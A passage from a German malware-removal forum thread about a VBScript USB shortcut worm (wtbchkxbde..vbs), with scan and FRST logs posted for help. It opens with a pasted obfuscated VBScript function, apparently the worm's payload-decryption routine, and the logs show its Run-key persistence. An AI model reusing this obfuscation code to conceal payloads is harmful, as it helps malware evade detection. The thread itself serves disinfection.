Function FOFwEQObHcOMduGpSoigGYvXJZNxDE(FOFwEQObHcOMduGpSoigGYvXJZNxD, FOFwEQObHcOMduGpSoigGYvXJZN, FOFwEQObHcOMduGpSoigGYvXJZNx)
Rnd(-1)
Randomize FOFwEQObHcOMduGpSoigGYvXJZNx
FOFwEQObHcOMduGpSoigGYvXJZNxDEiXLOq = Int( ( Len(FOFwEQObHcOMduGpSoigGYvXJZN) - 1 + 1 ) * Rnd + 1 )
FOFwEQObHcOMduGpS = FOFwEQObHcOMduGpSoigGYvXJZNxDEi(FOFwEQObHcOMduGpSoigGYvXJZNxD)
FOFwEQObHcOMduGpSo = FOFwEQObHcOMduGpSoigGYvXJZNxDEi(FOFwEQObHcOMduGpSoigGYvXJZN)
For FOFwEQObHcOMduGpSoigGYvXJZNxDEiXLO = 0 to UBound( FOFwEQObHcOMduGpS ) - 1
FOFwEQObHcOMduGpSoi = FOFwEQObHcOMduGpSoigGYvXJZNxDEiXLO + FOFwEQObHcOMduGpSoigGYvXJZNxDEiXLOq
If FOFwEQObHcOMduGpSoi > UBound(FOFwEQObHcOMduGpSo) Then
Dim FOFwEQObHcOMdu
FOFwEQObHcOMdu = Int(FOFwEQObHcOMduGpSoi / (UBound(FOFwEQObHcOMduGpSo) + 1))
Dim FOFwEQObHcOMd
FOFwEQObHcOMd = ((UBound(FOFwEQObHcOMduGpSo) + 1 ))
FOFwEQObHcOMduGpSoi = FOFwEQObHcOMduGpSoi - FOFwEQObHcOMd * FOFwEQObHcOMdu
End If
FOFwEQObHcOMduGp = FOFwEQObHcOMduGpS(FOFwEQObHcOMduGpSoigGYvXJZNxDEiXLO) - FOFwEQObHcOMduGpSo(FOFwEQObHcOMduGpSoi)
If FOFwEQObHcOMduGp < 0 Then
FOFwEQObHcOMduGp = FOFwEQObHcOMduGp + 256
End If
dim FOFwEQObHcOM
FOFwEQObHcOM = Chr(FOFwEQObHcOMduGp)
FOFwEQObHcOMduG = FOFwEQObHcOMduG & FOFwEQObHcOM
NEXT
FOFwEQObHcOMduGpSoigGYvXJZNxDE = FOFwEQObHcOMduG
End Function
Habe mir einen anderen Antivirus organisiert (Smadv, Version vom 22.1.14). Dieser erkennt den Virus und findet die .vbs auch unter "C:\Users\Franz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup", nach dem Entfernen durch den Antivirus kommt die .vbs aber sofort wieder. Folgendes Log wurde erstellt: Code:
ATTFilter ==============================
Log File of Smadav 2014 Rev. 9.6
==============================
Scanning Results :
=> Time & Date : 11:12:39, on 04-09-2014
=> Finishing Time : 36 minutes,17 seconds
=> Folder Scanned :31530
=> File Scanned : 204327
=> File Detected : 2
=> File Cleaned : 0
=> File Skipped : 0
=> Value Scanned : 1234
=> Value Detected: 0
=> Value Fixed: 0
=> Path Scanned: 0
=> Path Hidden: 0
=> Path Unhidden: 0
==============================
Before Scanning
==============================
Suspected Paths :
=> Fine(Level 2) as : 1 Process
-C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceHelper.exe
=> Fine(Level 2) as : 1 Process
-C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServer.exe
=> Fine(Level 2) as : 1 Process
-C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
=> Fine(Level 1) as : 1 Process
-C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe
=> Fine(Level 1) as : 1 Process
-C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe
=> Fine(Level 1) as : 1 Process
-C:\Program Files (x86)\Launch Manager\dsiwmis.exe
=> Fine(Level 1) as : 1 Process
-C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
=> Fine(Level 1) as : 1 Process
-C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\IScheduleSvc.exe
=> Fine(Level 1) as : 1 Process
-C:\Program Files (x86)\Acer\Acer VCM\RS_Service.exe
=> Fine(Level 1) as : 1 Process
-C:\Program Files\Acer\Acer Updater\UpdaterService.exe
=> Fine(Level 1) as : 1 Process
-C:\Program Files (x86)\Acer\Acer VCM\AcerVCM.exe
=> Fine(Level 1) as : 1 Process
-C:\..\program files (x86)\Acer\Acer VCM\AcerVCM.exe
=> Fine(Level 1) as : 1 Process, 1 Startup
-C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\BackupManagerTray.exe
=> Fine(Level 1) as : 1 Process, 1 Startup
-C:\Program Files (x86)\Launch Manager\LManager.exe
=> Fine(Level 1) as : 1 Process, 1 Startup
-C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe
=> Fine(Level 1) as : 1 Process, 1 Startup
-C:\Program Files (x86)\HP\HP Software Update\hpwuschd2.exe
=> Fine(Level 1) as : 1 Process, 1 Startup
-C:\Program Files (x86)\iTunes\iTunesHelper.exe
=> Fine(Level 1) as : 1 Process
-C:\Program Files (x86)\Launch Manager\LMworker.exe
=> Fine(Level 1) as : 1 Process
-C:\Program Files (x86)\iTunes\iTunes.exe
=> Fine(Level 1) as : 1 Process
-C:\Program Files (x86)\Common Files\Apple\Apple Application Support\distnoted.exe
=> Fine(Level 1) as : 1 Process
-C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
=> Fine(Level 1) as : 1 Process
-C:\program files (x86)\Avira\antivir desktop\avconfig.exe
=> Fine(Level 1) as : 1 Startup
-C:\Program Files\NetLimiter 3\NLClientApp.exe
=> Fine(Level 1) as : 1 Startup
-C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe
=> Fine(Level 1) as : 1 Startup
-C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe
=> Fine(Level 1) as : 1 Startup
-C:\Users\Franz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wtbchkxbde..vbs
=> Fine(Level 1) as : 1 Startup
-C:\..\program files (x86)\vr-networld\vrtoolcheckorder.exe
Running Processes :
=> N/A
=> N/A
=> N/A
=> N/A
=> C:\Windows\System32\wininit.exe
=> N/A
=> N/A
=> N/A
=> N/A
=> N/A
=> C:\Windows\System32\svchost.exe
=> C:\Windows\System32\svchost.exe
=> N/A
=> C:\Windows\System32\svchost.exe
=> C:\Windows\System32\svchost.exe
=> C:\Windows\System32\svchost.exe
=> N/A
=> C:\Windows\System32\svchost.exe
=> C:\Windows\System32\svchost.exe
=> N/A
=> N/A
=> C:\Windows\System32\taskeng.exe
=> C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe
=> C:\Windows\System32\svchost.exe
=> C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe
=> C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
=> N/A
=> N/A
=> C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
=> N/A
=> C:\Windows\explorer.exe
=> N/A
=> C:\Program Files (x86)\Launch Manager\dsiwmis.exe
=> N/A
=> C:\Windows\System32\svchost.exe
=> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
=> N/A
=> C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\IScheduleSvc.exe
=> C:\Program Files (x86)\Acer\Acer VCM\RS_Service.exe
=> C:\Windows\System32\svchost.exe
=> C:\Program Files\Acer\Acer Updater\UpdaterService.exe
=> N/A
=> N/A
=> N/A
=> N/A
=> N/A
=> N/A
=> N/A
=> N/A
=> N/A
=> N/A
=> N/A
=> N/A
=> C:\Windows\System32\wscript.exe
=> C:\Program Files (x86)\Acer\Acer VCM\AcerVCM.exe
=> C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\BackupManagerTray.exe
=> C:\Program Files (x86)\Launch Manager\LManager.exe
=> N/A
=> N/A
=> C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe
=> C:\Program Files (x86)\HP\HP Software Update\hpwuschd2.exe
=> C:\Program Files (x86)\iTunes\iTunesHelper.exe
=> C:\Program Files (x86)\Launch Manager\LMworker.exe
=> N/A
=> N/A
=> N/A
=> N/A
=> N/A
=> N/A
=> N/A
=> N/A
=> N/A
=> N/A
=> C:\Program Files (x86)\iTunes\iTunes.exe
=> N/A
=> N/A
=> N/A
=> C:\Windows\System32\SearchIndexer.exe
=> C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceHelper.exe
=> N/A
=> C:\Program Files (x86)\Common Files\Apple\Apple Application Support\distnoted.exe
=> N/A
=> C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServer.exe
=> N/A
=> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
=> N/A
=> N/A
=> N/A
=> C:\Users\Franz\Desktop\Antivir\Peter\Smadav\SMΔRTP.exe
=> C:\program files (x86)\Avira\antivir desktop\avconfig.exe
=> N/A
==============================
After Scanning
==============================
Suspected Paths :
=> Unknown(Level 3) as : 1 Process
-C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceHelper.exe
=> Unknown(Level 3) as : 1 Process
-C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServer.exe
=> Unknown(Level 3) as : 1 Process
-C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\ATH.exe
=> Unknown(Level 3) as : 1 Process
-C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
=> Fine(Level 1) as : 1 Process
-C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe
=> Fine(Level 1) as : 1 Process
-C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe
=> Fine(Level 1) as : 1 Process
-C:\Program Files (x86)\Launch Manager\dsiwmis.exe
=> Fine(Level 1) as : 1 Process
-C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
=> Fine(Level 1) as : 1 Process
-C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\IScheduleSvc.exe
=> Fine(Level 1) as : 1 Process
-C:\Program Files (x86)\Acer\Acer VCM\RS_Service.exe
=> Fine(Level 1) as : 1 Process
-C:\Program Files\Acer\Acer Updater\UpdaterService.exe
=> Fine(Level 1) as : 1 Process
-C:\Program Files (x86)\Acer\Acer VCM\AcerVCM.exe
=> Fine(Level 1) as : 1 Process
-C:\..\program files (x86)\Acer\Acer VCM\AcerVCM.exe
=> Fine(Level 1) as : 1 Process, 1 Startup
-C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\BackupManagerTray.exe
=> Fine(Level 1) as : 1 Process, 1 Startup
-C:\Program Files (x86)\Launch Manager\LManager.exe
=> Fine(Level 1) as : 1 Process, 1 Startup
-C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe
=> Fine(Level 1) as : 1 Process, 1 Startup
-C:\Program Files (x86)\HP\HP Software Update\hpwuschd2.exe
=> Fine(Level 1) as : 1 Process, 1 Startup
-C:\Program Files (x86)\iTunes\iTunesHelper.exe
=> Fine(Level 1) as : 1 Process
-C:\Program Files (x86)\Launch Manager\LMworker.exe
=> Fine(Level 1) as : 1 Process
-C:\Program Files (x86)\iTunes\iTunes.exe
=> Fine(Level 1) as : 1 Process
-C:\Program Files (x86)\Common Files\Apple\Apple Application Support\distnoted.exe
=> Fine(Level 1) as : 1 Process
-C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
=> Fine(Level 1) as : 1 Process
-C:\program files (x86)\Avira\antivir desktop\avconfig.exe
=> Fine(Level 1) as : 1 Startup
-C:\Program Files\NetLimiter 3\NLClientApp.exe
=> Fine(Level 1) as : 1 Startup
-C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe
=> Fine(Level 1) as : 1 Startup
-C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe
=> Fine(Level 1) as : 1 Startup
-C:\Users\Franz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wtbchkxbde..vbs
=> Fine(Level 1) as : 1 Startup
-C:\..\program files (x86)\vr-networld\vrtoolcheckorder.exe
Running Processes :
=> N/A
=> N/A
=> N/A
=> N/A
=> C:\Windows\System32\wininit.exe
=> N/A
=> N/A
=> N/A
=> N/A
=> N/A
=> C:\Windows\System32\svchost.exe
=> C:\Windows\System32\svchost.exe
=> N/A
=> C:\Windows\System32\svchost.exe
=> C:\Windows\System32\svchost.exe
=> C:\Windows\System32\svchost.exe
=> N/A
=> C:\Windows\System32\svchost.exe
=> C:\Windows\System32\svchost.exe
=> N/A
=> N/A
=> C:\Windows\System32\taskeng.exe
=> C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe
=> C:\Windows\System32\svchost.exe
=> C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe
=> C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
=> N/A
=> N/A
=> C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
=> N/A
=> C:\Windows\explorer.exe
=> N/A
=> C:\Program Files (x86)\Launch Manager\dsiwmis.exe
=> N/A
=> C:\Windows\System32\svchost.exe
=> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
=> N/A
=> C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\IScheduleSvc.exe
=> C:\Program Files (x86)\Acer\Acer VCM\RS_Service.exe
=> C:\Windows\System32\svchost.exe
=> C:\Program Files\Acer\Acer Updater\UpdaterService.exe
=> N/A
=> N/A
=> N/A
=> N/A
=> N/A
=> N/A
=> N/A
=> N/A
=> N/A
=> N/A
=> N/A
=> N/A
=> C:\Windows\System32\wscript.exe
=> C:\Program Files (x86)\Acer\Acer VCM\AcerVCM.exe
=> C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\BackupManagerTray.exe
=> C:\Program Files (x86)\Launch Manager\LManager.exe
=> N/A
=> N/A
=> C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe
=> C:\Program Files (x86)\HP\HP Software Update\hpwuschd2.exe
=> C:\Program Files (x86)\iTunes\iTunesHelper.exe
=> C:\Program Files (x86)\Launch Manager\LMworker.exe
=> N/A
=> N/A
=> N/A
=> N/A
=> N/A
=> N/A
=> N/A
=> N/A
=> N/A
=> N/A
=> C:\Program Files (x86)\iTunes\iTunes.exe
=> N/A
=> N/A
=> N/A
=> C:\Windows\System32\SearchIndexer.exe
=> C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceHelper.exe
=> N/A
=> C:\Program Files (x86)\Common Files\Apple\Apple Application Support\distnoted.exe
=> N/A
=> C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServer.exe
=> N/A
=> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
=> N/A
=> N/A
=> N/A
=> C:\Users\Franz\Desktop\Antivir\Peter\Smadav\SMΔRTP.exe
=> C:\program files (x86)\Avira\antivir desktop\avconfig.exe
=> N/A
=> C:\Windows\System32\SearchProtocolHost.exe
=> C:\Windows\System32\SearchFilterHost.exe
=> C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\ATH.exe
=> N/A
=> N/A
Detected Virus :
=> VBS.Encrypted.B
-Infected File
-C:\Users\Franz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wtbchkxbde..vbs
=> New Heur.FFD(VBS)
-Infected File
-E:\wtbchkxbde..vbs
Mein Laptop hängt sich seit dem Virusbefall ohne Belastung (Word oder Spidersolitär) manchmal auf (bis jetzt 4 mal seit einer Woche) Seit ich smadav benutzt habe sind meine Desktopsymbole schmaler und näher nebeneinander (Höhe ist normal). Keine Ahnung ob das mit dem Virus zu tun hat, falls jemand zufällig eine Lösung dafür hat wäre das sehr nett. Ich komme nur sehr unregelmäßig online, versuche aber etwaige Fragen schnell zu beantworten Hier im Dorf ist der Virus anscheinend auf jedem PC, ein ganzer Stamm wird euch also dankbar sein für jegliche Hilfe Viele Grüße aus dem Dschungel Franz |
|
13.04.2014, 13:13
| #2 |
| /// the machine /// TB-Ausbilder    | Flash Drive Shortcut Virus wtbchkxbde..vbs hi,
__________________Bitte lade dir die passende Version von Farbar's Recovery Scan Tool auf deinen Desktop:  FRST 32-Bit | FRST 64-Bit(Wenn du nicht sicher bist: Lade beide Versionen oder unter Start > Computer (Rechtsklick) > Eigenschaften nachschauen)
__________________ |
|
14.04.2014, 09:56
| #3 |
| | Flash Drive Shortcut Virus wtbchkxbde..vbs Danke für die schnelle Antwort!
__________________FRST.txt: FRST Logfile: FRST Logfile: Code:
ATTFilter Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 13-04-2014 01
Ran by Franz (administrator) on FRANZ-PC on 14-04-2014 10:43:32
Running from C:\Users\Franz\Desktop
Windows 7 Home Premium (X64) OS Language: German Standard
Internet Explorer Version 9
Boot Mode: Normal
==================== Processes (Whitelisted) =================
(AMD) C:\Windows\system32\atiesrxx.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe
(AMD) C:\Windows\system32\atieclxx.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Atheros Commnucations) C:\Program Files (x86)\Bluetooth Suite\adminservice.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Dritek System Inc.) C:\Program Files (x86)\Launch Manager\dsiwmis.exe
(Acer Incorporated) C:\Program Files\Acer\Acer PowerSmart Manager\ePowerSvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(Locktime Software) C:\Program Files\NetLimiter 3\nlsvc.exe
(NewTech Infosystems, Inc.) C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\IScheduleSvc.exe
(Acer Incorporated) C:\Program Files (x86)\Acer\Acer VCM\RS_Service.exe
(Acer Group) C:\Program Files\Acer\Acer Updater\UpdaterService.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Alcor Micro Corp.) C:\Program Files (x86)\AmIcoSingLun\AmIcoSinglun64.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Atheros Commnucations) C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe
(Atheros Commnucations) C:\Program Files (x86)\Bluetooth Suite\AthBtTray.exe
(Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\Apoint.exe
(Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\ApMsgFwd.exe
(Locktime Software) C:\Program Files\NetLimiter 3\NLClientApp.exe
(Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\HidFind.exe
(Microsoft Corporation) C:\Windows\System32\wscript.exe
(Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\Apntex.exe
(Acer Incorporated) C:\Program Files (x86)\Acer\Acer VCM\AcerVCM.exe
(NewTech Infosystems, Inc.) C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\BackupManagerTray.exe
(Dritek System Inc.) C:\Program Files (x86)\Launch Manager\LManager.exe
(Dritek System Inc.) C:\Program Files (x86)\Launch Manager\MMDx64Fx.exe
(Dritek System Inc.) C:\Program Files (x86)\Launch Manager\LMworker.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe
(Hewlett-Packard) C:\Program Files (x86)\HP\HP Software Update\hpwuschd2.exe
(Apple Inc.) C:\Program Files (x86)\iTunes\iTunesHelper.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSvcM.exe
(Apple Inc.) C:\Program Files (x86)\iTunes\iTunes.exe
(Acer Incorporated) C:\Program Files\Acer\Acer PowerSmart Manager\ePowerTray.exe
(Acer Incorporated) C:\Program Files\Acer\Acer PowerSmart Manager\ePowerEvent.exe
(Intel Corporation) C:\Windows\system32\igfxext.exe
(Intel Corporation) C:\Windows\system32\igfxsrvc.exe
(Advanced Micro Devices Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
(ATI Technologies Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avshadow.exe
(Intel Corporation) C:\Windows\system32\igfxtray.exe
(Intel Corporation) C:\Windows\system32\hkcmd.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceHelper.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\distnoted.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServer.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
==================== Registry (Whitelisted) ==================
HKLM\...\Run: [AmIcoSinglun64] => C:\Program Files (x86)\AmIcoSingLun\AmIcoSinglun64.exe [323584 2009-09-23] (Alcor Micro Corp.)
HKLM\...\Run: [mwlDaemon] => C:\Program Files (x86)\EgisTec MyWinLocker\x86\mwlDaemon.exe
HKLM\...\Run: [IgfxTray] => C:\Windows\system32\igfxtray.exe [166424 2010-04-21] (Intel Corporation)
HKLM\...\Run: [HotKeysCmds] => C:\Windows\system32\hkcmd.exe [391192 2010-04-21] (Intel Corporation)
HKLM\...\Run: [Persistence] => C:\Windows\system32\igfxpers.exe [413720 2010-04-21] (Intel Corporation)
HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [9996320 2010-01-20] (Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [877600 2010-01-20] (Realtek Semiconductor)
HKLM\...\Run: [AtherosBtStack] => C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe [585376 2010-05-25] (Atheros Commnucations)
HKLM\...\Run: [AthBtTray] => C:\Program Files (x86)\Bluetooth Suite\AthBtTray.exe [354464 2010-05-25] (Atheros Commnucations)
HKLM\...\Run: [Apoint] => C:\Program Files\Apoint2K\Apoint.exe [345648 2010-03-09] (Alps Electric Co., Ltd.)
HKLM\...\Run: [Acer ePower Management] => C:\Program Files\Acer\Acer PowerSmart Manager\ePowerTrayLauncher.exe [496160 2010-02-02] (Acer Incorporated)
HKLM\...\Run: [BCSSync] => C:\Program Files\Microsoft Office\Office14\BCSSync.exe [108144 2012-11-05] (Microsoft Corporation)
HKLM\...\Run: [wtbchkxbde] => wscript.exe //B "C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs" <===== ATTENTION
HKLM-x32\...\Run: [BackupManagerTray] => C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\BackupManagerTray.exe [260608 2010-03-09] (NewTech Infosystems, Inc.)
HKLM-x32\...\Run: [StartCCC] => C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [98304 2010-04-21] (Advanced Micro Devices, Inc.)
HKLM-x32\...\Run: [LManager] => C:\Program Files (x86)\Launch Manager\LManager.exe [960080 2010-05-26] (Dritek System Inc.)
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [43848 2014-02-12] (Apple Inc.)
HKLM-x32\...\Run: [avgnt] => C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe [689744 2014-02-20] (Avira Operations GmbH & Co. KG)
HKLM-x32\...\Run: [HP Software Update] => C:\Program Files (x86)\Hp\HP Software Update\HPWuSchd2.exe [49208 2011-10-28] (Hewlett-Packard)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [iTunesHelper] => C:\Program Files (x86)\iTunes\iTunesHelper.exe [152392 2014-02-21] (Apple Inc.)
HKLM-x32\...\Run: [wtbchkxbde] => wscript.exe //B "C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs"
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-19\...\Run: [Sidebar] => C:\Program Files\Windows Sidebar\Sidebar.exe [1475072 2009-07-14] (Microsoft Corporation)
HKU\S-1-5-20\...\Run: [Sidebar] => C:\Program Files\Windows Sidebar\Sidebar.exe [1475072 2009-07-14] (Microsoft Corporation)
HKU\S-1-5-21-2199740673-3875191607-274323708-1001\...\Run: [NetLimiter] => C:\Program Files\NetLimiter 3\NLClientApp.exe [2910208 2011-03-21] (Locktime Software)
HKU\S-1-5-21-2199740673-3875191607-274323708-1001\...\Run: [wtbchkxbde] => wscript.exe //B "C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs" <===== ATTENTION
Startup: C:\Users\Franz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wtbchkxbde..vbs ()
==================== Internet (Whitelisted) ====================
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.google.com.ph/intl/en/
HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://homepage.acer.com/rdr.aspx?b=ACAW&l=0407&m=aspire_3820&r=27360413h416l0408z115t6741k596
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://homepage.acer.com/rdr.aspx?b=ACAW&l=0407&m=aspire_3820&r=27360413h416l0408z115t6741k596
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://homepage.acer.com/rdr.aspx?b=ACAW&l=0407&m=aspire_3820&r=27360413h416l0408z115t6741k596
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://homepage.acer.com/rdr.aspx?b=ACAW&l=0407&m=aspire_3820&r=27360413h416l0408z115t6741k596
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://homepage.acer.com/rdr.aspx?b=ACAW&l=0407&m=aspire_3820&r=27360413h416l0408z115t6741k596
StartMenuInternet: IEXPLORE.EXE - C:\Program Files (x86)\Internet Explorer\iexplore.exe
SearchScopes: HKLM-x32 - {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7ACAW
SearchScopes: HKCU - DefaultScope {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7ACAW_deDE532
SearchScopes: HKCU - {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7ACAW_deDE532
BHO: Groove GFS Browser Helper - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)
